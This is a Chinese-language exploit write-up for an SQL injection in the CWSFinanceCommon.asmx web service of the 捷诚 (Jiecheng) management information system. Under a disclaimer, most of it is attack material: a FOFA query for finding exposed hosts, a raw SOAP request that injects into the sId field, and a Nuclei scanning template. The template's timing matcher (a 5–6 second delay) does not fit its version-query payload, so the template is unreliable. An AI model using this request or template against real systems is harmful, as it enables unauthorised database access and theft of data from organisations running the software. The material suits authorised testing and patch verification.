捷诚管理信息系统CWSFinanceCommon.asmx SQL注入漏洞复现 [附POC]

捷诚管理信息系统CWSFinanceCommon.asmx SQL注入漏洞复现 [附POC]

0x01 前言

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用！！！

0x02 漏洞描述

捷诚管理信息系统中的CWSFinanceCommon.asmx存在SQL注入漏洞，攻击者可通过在相关请求中注入恶意的SQL语句，绕过身份验证和访问控制，从而执行任意数据库操作。成功利用此漏洞可能导致敏感信息泄露、数据篡改或执行未经授权的操作，对系统的机密性、完整性和可用性构成潜在威胁。

建议立即修复漏洞，采取有效地输入验证和参数化查询等防御措施，以提高系统对SQL注入攻击的抵御能力。

0x03 影响版本

捷诚管理信息系统

0x04 漏洞环境

FOFA语法：body=“/Scripts/EnjoyMsg.js”

0x05 漏洞复现

1.访问漏洞环境

2.构造POC

POC （POST）

POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
        <sId>1';SELECT @@VERSION--+</sId>
    </GetOSpById>
    </soap:Body>
</soap:Envelope>

3.复现

发送查询数据库版本的数据包

Nuclei POC

id: jiecheng-CWSFinanceCommon-sqli

info:
  name: 捷诚管理信息系统 CWSFinanceCommon.asmx SQL注入漏洞
  author: rain
  severity: high
  description: 捷诚管理信息系统是一款功能全面，可以支持自营、联营到外柜租赁的管理，其自身带工作流管理工具，能够帮助企业有效的开展内部审批工作。该系统CWSFinanceCommon.asmx 存在sql注入漏洞。黑客可以通过该漏洞获取数据库敏感信息，甚至远控服务器。
  tags: 2023,jiecheng,sqli
  metadata:
    max-request: 3
    fofa-query: body="/Scripts/EnjoyMsg.js"
    verified: true

http:
  - raw:
      - |
        POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
        Connection: close
        Content-Length: 369
        Accept: */*
        Accept-Language: en
        Content-Type: text/xml; charset=utf-8
        Accept-Encoding: gzip

        <?xml version="1.0" encoding="utf-8"?>
        <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
          <soap:Body>
            <GetOSpById xmlns="http://tempuri.org/">
              <sId>1';SELECT @@VERSION--+</sId>
            </GetOSpById>
          </soap:Body>
        </soap:Envelope>

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 && duration>=5 && duration<=6"

0x06 修复建议

定期更新和修补软件：保持数据库软件和应用程序的最新版本，并及时应用安全补丁。